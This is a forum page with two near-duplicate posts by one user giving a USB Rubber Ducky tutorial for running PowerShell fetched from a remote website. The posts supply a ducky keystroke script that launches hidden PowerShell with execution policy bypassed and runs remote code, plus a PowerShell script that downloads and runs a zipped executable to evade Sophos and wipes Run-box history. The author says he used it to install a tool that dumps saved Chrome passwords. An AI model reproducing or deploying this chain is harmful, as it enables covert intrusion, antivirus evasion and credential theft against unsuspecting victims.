Jump to content

WAZ

Members
  • Posts

    2
  • Joined

  • Last visited

Posts posted by WAZ

  1. 2 minutes ago, WAZ said:

    How does it work / what is it?

    I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

    This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

    Tutorial:

    First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

    Script for website:

    The code on my website looks something like below. You can put whatever you want in here. Personally I used it to download an .EXE which dumps saved chrome passwords into a database using an API we created. 

    
    Add-Type -AssemblyName System.IO.Compression.FileSystem
    function Unzip
    {
        param([string]$zipfile, [string]$outpath)
    
        [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
    }
    
    $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
    $arr = (Get-Item -Path $path).Property 
    $url = "www.linkToEndPayload"
    $output = "$env:temp/test.zip";
    $out = "$env:temp/Remake.txt";
    
    Remove-Item -Path $output
    Invoke-WebRequest -Uri $url -OutFile $output
    
    Unzip $output "$env:temp/"
    Rename-Item -Path $out -NewName "Remake.exe"
    
    Start-Process -FilePath "$env:temp/Remake.exe"
    
    foreach($item in $arr) 
    { 
       if($item -ne "MRUList") 
       { 
         Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
       } 
    }

    This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

    Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

    Script for ducky:

    
    DELAY 500
    GUI r
    DELAY 100
    STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
    ENTER

    That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

    PS: I'm not very good at PowerShell Scripting :wacko: + First post! 

     

  2. How does it work / what is it?

    I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky!

    This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. 

    Tutorial:

    First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime.

    Script for website:

    The code on my website looks something like this...

    Add-Type -AssemblyName System.IO.Compression.FileSystem
    function Unzip
    {
        param([string]$zipfile, [string]$outpath)
    
        [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)
    }
    
    $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" 
    $arr = (Get-Item -Path $path).Property 
    $url = "www.linkToEndPayload"
    $output = "$env:temp/test.zip";
    $out = "$env:temp/Remake.txt";
    
    Remove-Item -Path $output
    Invoke-WebRequest -Uri $url -OutFile $output
    
    Unzip $output "$env:temp/"
    Rename-Item -Path $out -NewName "Remake.exe"
    
    Start-Process -FilePath "$env:temp/Remake.exe"
    
    foreach($item in $arr) 
    { 
       if($item -ne "MRUList") 
       { 
         Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue 
       } 
    }

    This code downloads the .EXE payload (Which is stored in a .ZIP file.)  We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates.

    Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this...

    Script for ducky:

    DELAY 500
    GUI r
    DELAY 100
    STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a
    ENTER

    That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection.

    PS: I'm not very good at PowerShell Scripting :wacko:

×
×
  • Create New...